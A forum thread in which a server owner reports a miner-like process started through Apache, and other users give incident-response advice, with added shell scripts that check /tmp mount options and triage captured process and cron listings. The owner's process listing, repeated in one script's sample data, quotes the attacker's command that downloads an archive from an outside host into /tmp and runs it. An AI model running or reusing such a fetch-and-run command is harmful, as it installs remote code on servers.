Full Version: Have I been hacked?
The Planet Forums > Security > General Security
gustave
I see a process called "oper" using 98% of my CPU and running as nobody.
Here is the full process listing below. Through apache, someone has uploaded a script into /tmp and is running it. How concerned do I need to be, and how did they get in? How can I prevent it? Any thoughts? Searching for oper.tar or anything results in not much....

nobody 4212 8059 0 Jun03 ? 00:00:00 sh -c cd /tmp;wget attilahack.100free.com/oper.tar;tar xvf oper.tar;./oper;rm -rf oper.tar
nobody 4218 4212 95 Jun03 ? 07:03:04 ./oper
nobody 4221 4218 0 Jun03 ? 00:00:00 [oper]
James Jhurani
Honestly, it looks like you were hacked.

They didn't get root... so their access is pretty limited. To fix this... remount your /tmp as non-executable. You can find a how-to guide here on the forums, or open up a ticket and ask the ev1 techs to remount your /tmp as non-executable. I'm sure if the right tech reads it, he will be more than willing to help. If you run into any problems, let me know, and I will walk you through it.

To get rid of any processes run by the attacker, simply reboot your server. That will clear out /tmp and kill his processes.


-James
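A way to check the mount state James is talking about, as an added example that is not part of the thread or any poster's own commands: it reads a /proc/mounts-style file passed as a parameter (so a captured copy can be examined offline) and reports whether /tmp carries noexec, nosuid and nodev. The two mount snapshots are constructed; the tmpfs size in the fstab line is an assumed value.

```shell
#!/bin/sh
# Added example (not from the thread): check whether /tmp is mounted
# noexec/nosuid/nodev and print the fstab line that would enforce it.

# tmp_mount_opts FILE -> option string of the /tmp entry in a
# /proc/mounts-style file (fields: device mountpoint fstype options ...)
tmp_mount_opts() {
    awk '$2 == "/tmp" { print $4 }' "$1"
}

# tmp_is_hardened FILE -> exit 0 only when noexec, nosuid and nodev are all set
tmp_is_hardened() {
    opts=$(tmp_mount_opts "$1")
    [ -n "$opts" ] || return 1            # no separate /tmp mount at all
    for want in noexec nosuid nodev; do
        case ",$opts," in
            *",$want,"*) ;;
            *) return 1 ;;
        esac
    done
    return 0
}

# tmp_fstab_line -> /etc/fstab entry for a tmpfs /tmp with those options
# (size=512m is an assumed value; pick one that fits the box)
tmp_fstab_line() {
    printf 'tmpfs /tmp tmpfs rw,noexec,nosuid,nodev,size=512m 0 0\n'
}

# Constructed samples: a weak snapshot and a hardened one.
WEAK_MOUNTS=$(mktemp)
HARD_MOUNTS=$(mktemp)
cat >"$WEAK_MOUNTS" <<'EOF'
/dev/sda1 / ext3 rw,relatime 0 0
/dev/sda3 /tmp ext3 rw,relatime 0 0
EOF
cat >"$HARD_MOUNTS" <<'EOF'
/dev/sda1 / ext3 rw,relatime 0 0
tmpfs /tmp tmpfs rw,noexec,nosuid,nodev,size=512m 0 0
EOF

# Stand-alone run: report on the weak snapshot and show the remediation.
if ! tmp_is_hardened "$WEAK_MOUNTS"; then
    echo "/tmp lacks noexec/nosuid/nodev; fstab line to apply:"
    tmp_fstab_line
fi
# On the live box: mount -o remount,noexec,nosuid,nodev /tmp
# then add the fstab line so the setting survives the reboot.
```

Point the functions at a copy of /proc/mounts from the server to check its real state. The noexec flag stops direct execution like the `./oper` in the listing, but a script handed to an interpreter that lives elsewhere still runs, which is why the advice further down about patching the exposed application and stopping unneeded interpreters still applies.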
unSpawn
to fix this
I would suggest using ssh to log in and then dropping inbound and outbound traffic at the firewall except for your management IP (range). This will deny any new processes access. Then kill rogue processes, which stops current traffic. Since they run as a lesser-privileged user (and we do not expect to see more advanced methods), killing them as root should be easy: no reboot necessary. Stop or kill any non-vital internet-facing services like httpd and any non-vital interpreter (PHP, perl, whatever else) processes. Your server got piggybacked because you run an unpatched version of a product people can interact with. To fix this, upgrade whatever needs upgrading. Verify everything is as it should be, clean up, read up on and perform host hardening.

Just my two zloty.
James Jhurani
I suggest a reboot regardless of whatever method you choose to secure your server, mainly because of the recent toys I have been seeing.

There was a file that could launch the process as another name. They were running it with the same name as the httpd daemon... I'd rather have the 2 minutes of downtime and be sure his processes are stopped than keep my uptime.
theuruguayan
Another important thing is to check /var/spool/cron/nobody to see if the hacker didn't install an autoinstall/autoupdate/autorestart script.
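A triage script for what gustave's listing, unSpawn's "kill rogue processes" step and the cron check above amount to, as an added example that is none of the posters' own tooling: it takes a captured `ps -ef` listing and a cron spool directory as parameters so they can be examined offline, flags the web-server user's processes whose command line mentions /tmp or a downloader and pulls in their descendants (the `./oper` child and the `[oper]` grandchild carry no /tmp in their arguments), and lists non-comment crontab lines of the same flavour. The listing and crontab below are constructed from the thread; the keyword pattern is a heuristic, not a complete signature.

```shell
#!/bin/sh
# Added example (not from the thread): triage a captured "ps -ef" listing
# and a cron spool for the pattern seen in the thread. Both functions take
# paths so captured copies can be examined offline; samples are constructed.

# rogue_pids PSFILE [USER] -> PIDs of USER's processes whose command line
# references /tmp, wget or curl, plus every descendant of those processes
rogue_pids() {
    awk -v user="${2:-nobody}" '
        NR == 1 && $1 == "UID" { next }      # skip the ps header
        {
            cmd = $8; for (i = 9; i <= NF; i++) cmd = cmd " " $i
            pid[NR] = $2; ppid[NR] = $3
            if ($1 == user && cmd ~ /\/tmp|wget|curl/) bad[$2] = 1
        }
        END {
            do {                             # add children until nothing new appears
                grew = 0
                for (n = 1; n <= NR; n++)
                    if (!(pid[n] in bad) && (ppid[n] in bad)) { bad[pid[n]] = 1; grew = 1 }
            } while (grew)
            for (n = 1; n <= NR; n++) if (pid[n] in bad) print pid[n]
        }' "$1"
}

# cron_suspects SPOOLDIR [USER] -> non-comment lines of SPOOLDIR/USER that
# reference /tmp, wget or curl; prints nothing when USER has no crontab
cron_suspects() {
    f="$1/${2:-nobody}"
    [ -f "$f" ] || return 0
    grep -v '^[[:space:]]*#' "$f" | grep -E '/tmp|wget|curl' || true
}

# Constructed samples -------------------------------------------------------
PS_SAMPLE=$(mktemp)
cat >"$PS_SAMPLE" <<'EOF'
UID        PID  PPID  C STIME TTY          TIME CMD
root      8059     1  0 Jun03 ?        00:00:05 /usr/sbin/httpd
nobody    4100  8059  0 Jun03 ?        00:00:02 /usr/sbin/httpd
nobody    4212  8059  0 Jun03 ?        00:00:00 sh -c cd /tmp;wget attilahack.100free.com/oper.tar;tar xvf oper.tar;./oper;rm -rf oper.tar
nobody    4218  4212 95 Jun03 ?        07:03:04 ./oper
nobody    4221  4218  0 Jun03 ?        00:00:00 [oper]
EOF
CRON_DIR=$(mktemp -d)
cat >"$CRON_DIR/nobody" <<'EOF'
# constructed: a relaunch entry of the kind the post above warns about
*/5 * * * * cd /tmp && ./oper >/dev/null 2>&1
EOF

# Stand-alone run: what an admin should review before killing anything as root.
echo "processes to review (kill as root once confirmed):"
rogue_pids "$PS_SAMPLE"
echo "crontab lines for nobody to review:"
cron_suspects "$CRON_DIR"
```

On the live box, confirm each listed PID with `ls -l /proc/PID/cwd /proc/PID/exe` before killing it, since a legitimate job that merely mentions /tmp in its arguments will also match; the cron spool check is what keeps the same thing from reappearing a few minutes after the kill.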
unSpawn
QUOTE (faze)
because of the recent toys I have been seeing

Is there a thread here or a write-up of that case? I'd be interested reading that.